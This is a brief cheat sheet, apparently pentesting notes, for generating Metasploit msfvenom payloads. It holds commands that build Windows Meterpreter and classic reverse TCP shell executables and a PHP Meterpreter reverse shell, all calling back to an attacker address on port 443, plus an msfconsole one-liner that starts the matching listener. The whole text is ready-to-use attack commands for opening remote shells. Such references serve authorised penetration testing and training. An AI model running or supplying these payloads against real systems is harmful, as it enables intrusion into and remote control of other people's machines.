##########
Metasploit
##########



********
MSFVenom
********

| Payloads generator


Windows
*******

.. code-block:: bash

  # EXE Meterpreter Reverse TCP 
  msfvenom -p windows/meterpreter/reverse_tcp LHOST=4.3.2.1 LPORT=443
  msfconsole -x 'use exploit/multi/handler;set PAYLOAD windows/meterpreter/reverse_tcp;set EXITONSESSION FALSE;set LHOST 0.0.0.0;set LPORT 443;run -j'

  # EXE Classic Reverse TCP
  msfvenom -p windows/shell_reverse_tcp LHOST=4.3.2.1 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rs.exe
  msfvenom -p windows/x64/shell_reverse_tcp LHOST=4.3.2.1 LPORT=443 EXITFUNC=thread -f exe -a x64 --platform windows -o rs.exe

  # PHP Reverse TCP
  msfvenom -p php/meterpreter/reverse_tcp LHOST=4.3.2.1 LPORT=443



